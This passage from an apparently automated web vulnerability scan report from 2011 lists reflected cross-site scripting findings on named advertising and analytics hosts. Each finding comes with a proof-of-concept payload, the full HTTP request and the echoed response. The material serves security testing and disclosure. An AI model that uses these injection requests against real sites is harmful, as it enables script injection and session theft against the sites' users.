Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:49 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
17682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...
4.69. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e30d8'-alert(1)-'5040089bc5a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:36 GMT
Content-Length: 1707

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...
4.70. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67532'-alert(1)-'10502941372 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:54:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:54:03 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1">
...[SNIP]...
4.71. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d69e'-alert(1)-'14515927802 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 1811

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950
...[SNIP]...
4.72. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ac054<script>alert(1)</script>48115ead9b3 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07611ac054<script>alert(1)</script>48115ead9b3 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 02 Oct 2011 23:48:55 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 03 Oct 2011 23:48:55 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:48:55 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07611AC054<SCRIPT>ALERT(1)</SCRIPT>48115EAD9B3" was not recognized.
*/
4.73. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 195d1"><script>alert(1)</script>213e8a8c6c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire195d1"><script>alert(1)</script>213e8a8c6c0/retargeting_hotel_results@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:48 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire195d1"><script>alert(1)</script>213e8a8c6c0/retargeting_hotel_results/1246322903/Bottom3/default/empty.gif/4d686437616b364a424c674141505766?" target="_top">
...[SNIP]...
4.74. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae78c"><script>alert(1)</script>e05ce80092f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3ae78c"><script>alert(1)</script>e05ce80092f HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:51 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1898594671/Bottom3ae78c"><script>alert(1)</script>e05ce80092f/default/empty.gif/4d686437616b364a424c674141505766?" target="_top">
...[SNIP]...
4.75. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa772"><script>alert(1)</script>983e8dd70cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3?aa772"><script>alert(1)</script>983e8dd70cf=1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 371
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:44 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1145901499/Bottom3/default/empty.gif/4d686437616b364a424c674141505766?aa772"><script>alert(1)</script>983e8dd70cf=1" target="_top">
...[SNIP]...
4.76. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 52c2f<script>alert(1)</script>3bcae053672 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=1&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=HOTEL200_SR_Navigation52c2f<script>alert(1)</script>3bcae053672&mboxId=0&mboxTime=1317582580525&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 218
Date: Mon, 03 Oct 2011 00:11:46 GMT
Server: Test & Target

mboxFactories.get('default').get('HOTEL200_SR_Navigation52c2f<script>alert(1)</script>3bcae053672',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317600406536-142286.19");
4.77. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4e803<script>alert(1)</script>d023063abdc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=1&mbox=trip_landing_vacation_pkgs4e803<script>alert(1)</script>d023063abdc&mboxId=0&mboxTime=1317584100633&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Mon, 03 Oct 2011 00:35:57 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_vacation_pkgs4e803<script>alert(1)</script>d023063abdc',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");
4.78. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9f6fa<img%20src%3da%20onerror%3dalert(1)>1c6c15d13c9 was submitted in the mbox parameter. This input was echoed as 9f6fa<img src=a onerror=alert(1)>1c6c15d13c9 in the application's response.

